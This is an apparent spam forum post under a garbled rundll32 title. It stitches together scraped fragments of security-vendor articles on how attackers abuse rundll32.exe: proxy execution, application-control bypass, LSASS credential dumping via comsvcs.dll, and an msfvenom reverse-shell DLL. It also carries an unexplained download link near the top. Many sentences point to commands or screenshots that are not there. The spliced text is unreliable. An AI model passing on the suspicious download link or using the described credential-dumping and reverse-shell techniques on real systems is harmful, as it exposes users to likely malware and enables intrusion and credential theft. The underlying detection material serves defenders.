Re: Name Rundll32.exe Comsvcs.dll File Version Not Loaded

0 views
Skip to first unread message
Message has been deleted

Nelson Suggs

unread,
Jul 13, 2024, 5:06:29 AM7/13/24
to theokilichar

Today, we are going to dwell on a Microsoft tool, the infamous rundll32.exe, which allows you to load and execute code. It is often used by adversaries during their offensive operations to execute malicious code through a process which we will explain in detail.

Rundll32.exe is a Microsoft-signed binary used to load dynamic link libraries (DLLs) in Windows. It is native to Windows and present in both 32 and 64 bit versions, respectively present in these places:

name rundll32.exe comsvcs.dll file version not loaded


Download https://vittuv.com/2yLUnW



On the one hand, rundll32.exe is an executable signed by Microsoft which is natively present on all Windows systems; on the other hand, it is also very flexible and efficient for loading code into memory, acting as a proxy for this purpose. Moreover, because rundll32.exe benefits from a certain degree of trust, it could be a possible AppLocker and Software Restriction Policies (SRP) bypass.

Last but not least, rundll32.exe is also able to help to dump the memory of processes, such as the LSASS (Local Security Authority Subsystem Service) process to retrieve credentials, which we will demonstrate.

Although rundll32.exe has frequent and undeniable legitimate use, it is also taken advantage of by many attackers, ranging from state-affiliated groups (APTs) to cybercriminal groups to proxy execution of malicious code.

We could also note that tools such as Cobalt Strike can use rundll32.exe to load DLL from the command line. This list could be much longer but the idea is to briefly summarize the importance, dangerousness and diversity of these groups that rely on rundll32.exe, so it is important to understand its mechanism to detect it.

Even if the entry point does not exist, the system will calls the DllMain function with the DLL_PROCESS_ATTACH value first and the relevant code will be executed followed by an error message because of the missing entry point.

Note: As per Microsoft API documentation, when rundll32.exe calls the DllMain function with any specific entry point, (i.e. a value other than DLL_PROCESS_ATTACH), the return value is ignored. If the return value is FALSE when DllMain is called during process initialization, the process terminates with an error and GetLastError is called to provide extended error information.

Note: This behavior was previously discussed, it is related to the dwFlags set to LOAD_WITH_ALTERED_SEARCH_PATH when calling LoadLibraryExW from rundll32.exe (this flag is not under control).

Finally, please note that it is not a good practice to call CreateProcess within DllMain, as it could lead to improper synchronization and cause an application to deadlock as creating a process can load another DLL.

As result, we could notice a spawned cmd.exe with non-existing parent because the rundll32.exe process (PID 1844) is terminated and cmd.exe process (PID 10904) was created as a new and independent process:

However, thanks to the Cybereason Defense Platform, we could examine the history, all loaded modules and all other relevant information and also visualize the processes tree to notice that rundll32.exe is the parent of cmd.exe:

We have seen that rundll32.exe is a powerful asset for adversaries to proxy execution of arbitrary and malicious code. This binary has another ace in the hole, it could leverage comsvcs.dll (a Microsoft-signed DLL) which exports a function called MiniDumpW that rely on MiniDumpWriteDump to dump lsass.exe (Local Security Authority Subsystem Service) process memory to retrieve credentials.

Indeed, on the one hand, we already noticed that Cybereason is able to avoid false positives about benign use of rundll32.exe, using our test DLL to spawn another Windows binary which is not causing any harm to the system:

Note: For the following tests, we configured the EDR with features and options in "detection" mode only to demonstrate detection capabilities without immediately blocking the attacks ("prevention" mode).

To continue our examples, we could now create a malicious DLL using msfvenom to initiate a reverse shell to an adversary-controlled system. We will select a staged Reverse TCP Meterpreter payload and name it sample.dll:

The queries provided in this section can be used to hunt for possible malicious rundll32.exe processes. First of all, the following query provide all instances of rundll32.exe (including non-malicious ones), to have an overview of activities:

Cybereason is dedicated to teaming with Defenders to end attacks on the endpoint, across enterprise, to everywhere the battle is taking place. Learn more about the AI-driven Cybereason Defense Platform here or schedule a demo today to learn how your organization can benefit from an operation-centric approach to security.

The Cybereason Blue Team is a global unit focused on mitigating advanced adversarial techniques leveraged by high level Threat Actors and Red Teams across the globe. The Blue Team is comprised of experts in Red Teaming, Penetration Testing, Digital Forensics and Incident Response, giving them a unique insight into both sides of the coin. Working alongside customers and third-party Red Teams, and leveraging the Cybereason platform, the Blue Team is able to push the boundaries of detection and response well beyond commonly known Tactics, Techniques and Procedures (TTPs), reversing the adversarial advantage long before new techniques are adopted by mainstream Threat Actors. As part of Cybereason Threat Intelligence, the Blue Team is able to quickly translate these findings into MalOp detections, ensuring our entire customer base is protected.

The Cybereason GSOC delivers details on three recently observed attack scenarios where fast-moving malicious actors used the malware loaders IcedID, QBot and Emotet to deploy the Cobalt Strike framework on the compromised systems...

From a practical standpoint, Rundll32 enables the execution of dynamic link libraries (DLL). Executing malicious code as a DLL is relatively inconspicuous compared to the more common option of executing malicious code as an executable. Under certain conditions, particularly if you lack controls for blocking DLL loads, the execution of malicious code through Rundll32 can bypass application control solutions.

Application control solutions such as Windows Defender Application Control, VMware App Control, Airlock, and others can provide functionality to limit which DLLs can be loaded and executed into memory.

Command-line parameters are some of the most reliable telemetry for detecting malicious use of Rundll32, since adversaries often need to pass command-line arguments for Rundll32 to execute. Eight of our top 10 detection analytics for Rundll32 include a command-line component. Capturing command-line activity will capture the both name of the DLL that was launched by rundll32.exe and any additional command-line arguments.

DLL monitoring will supply context about the malicious DLL that was supplied at the command line, including its file hash and directory. Module load monitoring can be useful on its own, particularly if an adversary is supplying overtly malicious or suspicious DLLs, but the telemetry source works best in conjunction with others.

Sysmon Event ID 1 logs information about process execution and corresponding command lines. This is a great starting point for gaining visibility into adversarial abuse of Rundll32, as most Red Canary detection analytics for this and other techniques lean heavily on a combination of process and command monitoring.

Sysmon Event ID 3 logs network connections and ties those connections to corresponding processes. Disabled by default, the log includes information about source and destination IP addresses, ports, and more. While this Sysmon event log can provide important context for an investigation, it can also generate a lot of distraction. Fortunately, Sysmon offers powerful filtering, enabling network connection monitoring to be limited to specific processes.

Sysmon Event ID 7 logs all DLL loads. It is also disabled by default because it generates a large amount of noise. Tuning will be critical if you hope to operationalize this data source in any meaningful way. That said, it can provide detailed context about the malicious DLL an adversary executed, including its file hash and directory.

Sysmon will log an event when it detects a process creating a thread in another process. In the case of process injection, it could be possible to identify Rundll32 injecting into LSASS to perform credential theft.

Red Canary has developed more than 100 distinct detection analytics to catch malicious and suspicious Rundll32 behaviors. The following section summarizes some of our most successful analytics for detecting malicious use of Rundll32.

Consider monitoring for instances of rundll32.exe running Windows native DLLs that have export functionalities that adversaries commonly leverage for executing malicious code and evading defensive controls. The following pseudo-analytic applies specifically to adversaries who use the MiniDump export functionality of comsvcs.dll to dump the contents of LSASS, but this logic could be adapted to detect other malicious activity as well.

Rundll32 does not normally execute without corresponding command-line arguments and while spawning a child process. Given this, you may want to alert on the execution of processes that appear to be rundll32.exe without any command-line arguments , especially when they spawn child processes or make network connections.

While process monitoring and command-line parameters are great sources for telemetry that can be useful for detecting malicious Rundll32, they require environment-specific tuning. As you can imagine, Rundll32 is used by many legitimate tools. To avoid flooding your security team with a ton of false positives, establish a baseline on what activity is normal in your environment and then write rules that will exclude the known activity. This is a great starting point, but keep in mind that these analytics will likely require a lot of tuning and monitoring to get to the point where they reliably produce high-fidelity alerting.

7fc3f7cf58
Reply all
Reply to author
Forward
0 new messages